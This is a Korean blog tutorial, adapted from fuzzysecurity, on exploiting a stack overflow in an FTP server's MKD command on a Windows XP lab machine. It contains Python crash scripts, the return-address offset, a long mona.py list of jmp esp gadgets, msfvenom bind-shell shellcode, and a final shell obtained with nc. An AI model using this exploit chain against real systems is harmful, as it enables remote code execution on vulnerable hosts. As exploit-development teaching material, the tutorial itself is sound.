[Window Application Exploit] Saved Return Pointer Overflows



출처: https://www.fuzzysecurity.com/tutorials.html


본 포스팅은 fuzzysecurity Tutorials part 2 -> Saved Return Pointer Overflows를 분석 및 의역하여 작성하였습니다. 

Windows Application에 존재하는 취약점을 학습하는 데 그 목적이 있습니다.



Step 1. Application

program을 실행시켜보면 port 번호를 설정하고 Start, Stop이 있습니다.

 

 

netstat으로 확인해보면 21번 port가 열려있는 것을 확인할 수 있습니다. 단순한 server 프로그램입니다.

 

 


Socket을 이용해 21번 port에 연결하는 python code를 작성합니다. 명령어는 FTP server에 대한 명령어를 code에 사용합니다.

import sys
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.236.128', 21))

print s.recv(1024)

s.send('USER anonymous\r\n')
print s.recv(1024)

s.send('PASS anonymous\r\n')
print s.recv(1024)

s.send('PWD\r\n')
print s.recv(1024)

s.send('LIST\r\n')
print s.recv(1024)

s.send('QUIT\r\n')
s.close

 

처음 연결이 되면 “USER”, “PASS” 명령어를 사용해 정보를 보내고 나머지 여러 명령어들을 실행시켜봅니다.

 

 

 

Step 2. Application 취약점

나타난 취약점은 ‘MKD string’, 즉 directory를 만들 때 넣는 directory name은 stack 공간에 들어가게 되는데 입력한 directory name이 길이에 대한 필터링을 거치지 않아 return address를 덮을 수 있습니다.

 

"A"를 0x300개를 directory name으로 보내는 exploit code 입니다.

import sys
import socket

evil = "A" * 0x300

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.236.128', 21))

print s.recv(1024)

s.send('USER anonymous\r\n')
print s.recv(1024)

s.send('PASS anonymous\r\n')
print s.recv(1024)

s.send('PWD\r\n')
print s.recv(1024)

s.send('MKD ' + evil + '\r\n')
print s.recv(1024)

s.send('QUIT\r\n')
s.close

  

해당 실행결과를 보면 오류 정보의 Offset에 0x41414141로 나와있습니다. “A”를 많이 넣어 return address 공간을 “AAAA”로 덮어 생긴 결과입니다.

 

 

 

Debugger로 정확한 확인을 해보았더니 EIP가 0x41414141로 변조되어 있습니다. 변조되는 사실은 알았으니 return address까지의 offset을 알아야 합니다.

 

 

 

Kali linux 를 이용해 pattern을 만들었습니다.

 

 

 

만든 pattern을 exploit code에 넣고 실행시켜보면 EIP가 0x69413269로 나오고 offset 확인을 해보면 247bytes라는 것을 알 수 있습니다.

 

 

 

Step 3. Exploit

Offset은 알았지만 Return Address를 어떤 주소로 덮을지를 알아야 합니다. 그리고 shellcode를 넣었다 하더라도 주소를 모르기 때문에 다른 방법을 생각해야 합니다. 우린 jmp esp gadget을 이용할 것입니다.

 

mona.py plugin을 이용해서 jmp esp gadget을 찾아야 합니다.

 

mona.py를 이용해 !mona jmp -r esp 명령어를 치게 되면 log 창에 아래와 같이 gadget들을 찾아주게 됩니다. 0x7c86467b에 있는 gadget을 쓰도록 하겠습니다. Kernel32.dll에 있는 gadget이고 SafeSEH, OS dll이 걸려있는 주소지만 xp이기 때문에 신경쓰지 않아도 됩니다.

Module info :
----------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
0x7c800000 | 0x7c930000 | 0x00130000 | False | True | False | False | True | 5.1.2600.5512 [kernel32.dll] (C:\WINDOWS\system32\kernel32.dll)
0x77bc0000 | 0x77c18000 | 0x00058000 | False | True | False | False | True | 7.0.2600.5512 [msvcrt.dll] (C:\WINDOWS\system32\msvcrt.dll)
0x7c930000 | 0x7c9cb000 | 0x0009b000 | False | True | False | False | True | 5.1.2600.5512 [ntdll.dll] (C:\WINDOWS\system32\ntdll.dll)
0x719c0000 | 0x719c8000 | 0x00008000 | False | True | False | False | True | 5.1.2600.5512 [wshtcpip.dll] (C:\WINDOWS\System32\wshtcpip.dll)
0x73f80000 | 0x73feb000 | 0x0006b000 | False | True | False | False | True | 1.0420.2600.5512 [USP10.dll] (C:\WINDOWS\system32\USP10.dll)
0x77ef0000 | 0x77f01000 | 0x00011000 | False | True | False | False | True | 5.1.2600.5512 [Secur32.dll] (C:\WINDOWS\system32\Secur32.dll)
0x719d0000 | 0x719d8000 | 0x00008000 | False | True | False | False | True | 5.1.2600.5512 [WS2HELP.dll] (C:\WINDOWS\system32\WS2HELP.dll)
0x76970000 | 0x76aad000 | 0x0013d000 | False | True | False | False | True | 5.1.2600.5512 [ole32.dll] (C:\WINDOWS\system32\ole32.dll)
0x77e70000 | 0x77ee6000 | 0x00076000 | False | True | False | False | True | 6.00.2900.5512 [SHLWAPI.dll] (C:\WINDOWS\system32\SHLWAPI.dll)
0x65cb0000 | 0x65d06000 | 0x00056000 | False | True | False | False | True | 5.1.2600.5512 [hnetcfg.dll] (C:\WINDOWS\system32\hnetcfg.dll)
0x77cf0000 | 0x77d80000 | 0x00090000 | False | True | False | False | True | 5.1.2600.5512 [USER32.dll] (C:\WINDOWS\system32\USER32.dll)
0x62340000 | 0x62349000 | 0x00009000 | False | True | False | False | True | 5.1.2600.5512 [LPK.DLL] (C:\WINDOWS\system32\LPK.DLL)
0x00400000 | 0x0040f000 | 0x0000f000 | False | False | False | False | False | -1.0- [FTPServer.exe] (C:\Documents and Settings\Administrator\바탕 화면\fuzzysecurity\687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver\Win32\FTPServer.exe)
0x5a480000 | 0x5a4b8000 | 0x00038000 | False | True | False | False | True | 6.00.2900.5512 [uxtheme.dll] (C:\WINDOWS\system32\uxtheme.dll)
0x7d5a0000 | 0x7dd9d000 | 0x007fd000 | False | True | False | False | True | 6.00.2900.5512 [SHELL32.dll] (C:\WINDOWS\system32\SHELL32.dll)
0x77d80000 | 0x77e12000 | 0x00092000 | False | True | False | False | True | 5.1.2600.5512 [RPCRT4.dll] (C:\WINDOWS\system32\RPCRT4.dll)
0x4b540000 | 0x4b55a000 | 0x0001a000 | False | True | False | False | True | 6.1.2600.3 [imekr61.ime] (C:\WINDOWS\system32\imekr61.ime)
0x77160000 | 0x77263000 | 0x00103000 | False | True | False | False | True | 6.0 [comctl32.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x762e0000 | 0x762fd000 | 0x0001d000 | False | True | False | False | True | 5.1.2600.5512 [IMM32.DLL] (C:\WINDOWS\system32\IMM32.DLL)
0x75110000 | 0x7513e000 | 0x0002e000 | False | True | False | False | True | 5.1.2600.5512 [msctfime.ime] (C:\WINDOWS\system32\msctfime.ime)
0x74660000 | 0x746ac000 | 0x0004c000 | False | True | False | False | True | 5.1.2600.5512 [MSCTF.dll] (C:\WINDOWS\system32\MSCTF.dll)
0x71980000 | 0x719bf000 | 0x0003f000 | False | True | False | False | True | 5.1.2600.5512 [mswsock.dll] (C:\WINDOWS\system32\mswsock.dll)
0x77e20000 | 0x77e69000 | 0x00049000 | False | True | False | False | True | 5.1.2600.5512 [GDI32.dll] (C:\WINDOWS\system32\GDI32.dll)
0x77f50000 | 0x77ff8000 | 0x000a8000 | False | True | False | False | True | 5.1.2600.5512 [ADVAPI32.dll] (C:\WINDOWS\system32\ADVAPI32.dll)
0x719e0000 | 0x719f7000 | 0x00017000 | False | True | False | False | True | 5.1.2600.5512 [WS2_32.dll] (C:\WINDOWS\system32\WS2_32.dll)
----------------------------------------------------------------------------------------------------------------------------------
0x7c86467b : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x719c1c8b : jmp esp | {PAGE_EXECUTE_READ} [wshtcpip.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\System32\wshtcpip.dll)
0x769e9bff : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769ea930 : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a3996b : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a5068d : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x77ebb227 : jmp esp | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x65ceb24f : jmp esp | {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
0x77d09353 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d256f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d35af7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d3b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x7d5b30d7 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b30eb : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b30ff : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b313b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b314f : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3163 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b318b : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b319f : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31b3 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31c7 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31db : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31ef : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3203 : jmp esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3217 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d71fa1e : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d728eed : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x77d9560a : jmp esp | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x77da025b : jmp esp | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x771836f8 : jmp esp | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x74691873 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
0x77e41d2f : jmp esp | {PAGE_EXECUTE_READ} [GDI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\GDI32.dll)
0x77f6f049 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f7965b : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f98063 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77fa3b63 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77fc2a9f : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x7c8369f0 : call esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x7c868667 : call esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x7c944663 : call esp | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x7c98311b : call esp | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x76996cca : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769d9622 : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769fe37b : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a1120b : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x7d5b30e3 : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d647ed3 : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d68f81b : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d6b0672 : call esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d72183c : call esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7469d20f : call esp | {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
0x719a8d3f : call esp | {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
0x77f6effc : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f6f0b2 : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f98153 : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f9c23b : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x719ef8fb : call esp | {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)
0x77c01025 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5512 (C:\WINDOWS\system32\msvcrt.dll)
0x7c949db0 : push esp # ret | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x76981594 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76983624 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769c0b4e : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a6dd4e : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a93995 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x77e7c62b : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e7c77f : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e84ba3 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e91d86 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e91e8c : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77ebd3a8 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x5a496aeb : push esp # ret | {PAGE_EXECUTE_READ} [uxtheme.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\uxtheme.dll)
0x7d5c56ad : push esp # ret | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x77dc6955 : push esp # ret | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x77163be9 : push esp # ret | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x7718c390 : push esp # ret | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x7511e436 : push esp # ret | {PAGE_EXECUTE_READ} [msctfime.ime] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\msctfime.ime)
0x719951a5 : push esp # ret | {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
0x77f51758 : push esp # ret | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x719e2b53 : push esp # ret | {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)

  

jmp esp 부분에서 esp가 가리키는 부분을 보면 “nd not understood” 부분의 주소를 가리키고 있습니다.

 

  

강제로 진행시키게 되면 String data가 어셈블리처럼 읽혀져 이상한 code를 실행하게 됩니다.

그렇다면 저 주소에 NOP Sled를 넣고 Shellcode를 넣어주면 실행될 것입니다.

 

 

Kali linux로 binding shellcode를 만들어주고 code에 추가시켰습니다. 그리고 Application을 실행시킨 뒤 code를 실행시키면 됩니다. 

root@kali:~# msfvenom -p windows/shell_bind_tcp LPORT=8888 -b '\x0D\x0A\x00' -f c
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
unsigned char buf[] =
"\xdb\xd3\xd9\x74\x24\xf4\xbd\x8a\x2b\xae\xbb\x58\x2b\xc9\xb1"
"\x53\x31\x68\x17\x83\xc0\x04\x03\xe2\x38\x4c\x4e\x0e\xd6\x12"
"\xb1\xee\x27\x73\x3b\x0b\x16\xb3\x5f\x58\x09\x03\x2b\x0c\xa6"
"\xe8\x79\xa4\x3d\x9c\x55\xcb\xf6\x2b\x80\xe2\x07\x07\xf0\x65"
"\x84\x5a\x25\x45\xb5\x94\x38\x84\xf2\xc9\xb1\xd4\xab\x86\x64"
"\xc8\xd8\xd3\xb4\x63\x92\xf2\xbc\x90\x63\xf4\xed\x07\xff\xaf"
"\x2d\xa6\x2c\xc4\x67\xb0\x31\xe1\x3e\x4b\x81\x9d\xc0\x9d\xdb"
"\x5e\x6e\xe0\xd3\xac\x6e\x25\xd3\x4e\x05\x5f\x27\xf2\x1e\xa4"
"\x55\x28\xaa\x3e\xfd\xbb\x0c\x9a\xff\x68\xca\x69\xf3\xc5\x98"
"\x35\x10\xdb\x4d\x4e\x2c\x50\x70\x80\xa4\x22\x57\x04\xec\xf1"
"\xf6\x1d\x48\x57\x06\x7d\x33\x08\xa2\xf6\xde\x5d\xdf\x55\xb7"
"\x92\xd2\x65\x47\xbd\x65\x16\x75\x62\xde\xb0\x35\xeb\xf8\x47"
"\x39\xc6\xbd\xd7\xc4\xe9\xbd\xfe\x02\xbd\xed\x68\xa2\xbe\x65"
"\x68\x4b\x6b\x13\x60\xea\xc4\x06\x8d\x4c\xb5\x86\x3d\x25\xdf"
"\x08\x62\x55\xe0\xc2\x0b\xfe\x1d\xed\x11\x47\xa8\x0b\x3f\xa7"
"\xfd\x84\xd7\x05\xda\x1c\x40\x75\x08\x35\xe6\x3e\x5a\x82\x09"
"\xbf\x48\xa4\x9d\x34\x9f\x70\xbc\x4a\x8a\xd0\xa9\xdd\x40\xb1"
"\x98\x7c\x54\x98\x4a\x1c\xc7\x47\x8a\x6b\xf4\xdf\xdd\x3c\xca"
"\x29\x8b\xd0\x75\x80\xa9\x28\xe3\xeb\x69\xf7\xd0\xf2\x70\x7a"
"\x6c\xd1\x62\x42\x6d\x5d\xd6\x1a\x38\x0b\x80\xdc\x92\xfd\x7a"
"\xb7\x49\x54\xea\x4e\xa2\x67\x6c\x4f\xef\x11\x90\xfe\x46\x64"
"\xaf\xcf\x0e\x60\xc8\x2d\xaf\x8f\x03\xf6\xdf\xc5\x09\x5f\x48"
"\x80\xd8\xdd\x15\x33\x37\x21\x20\xb0\xbd\xda\xd7\xa8\xb4\xdf"
"\x9c\x6e\x25\x92\x8d\x1a\x49\x01\xad\x0e";
 

Local에서 nc를 이용해 window xp의 shell을 획득하였습니다. 

 

 


이 글을 공유하기

댓글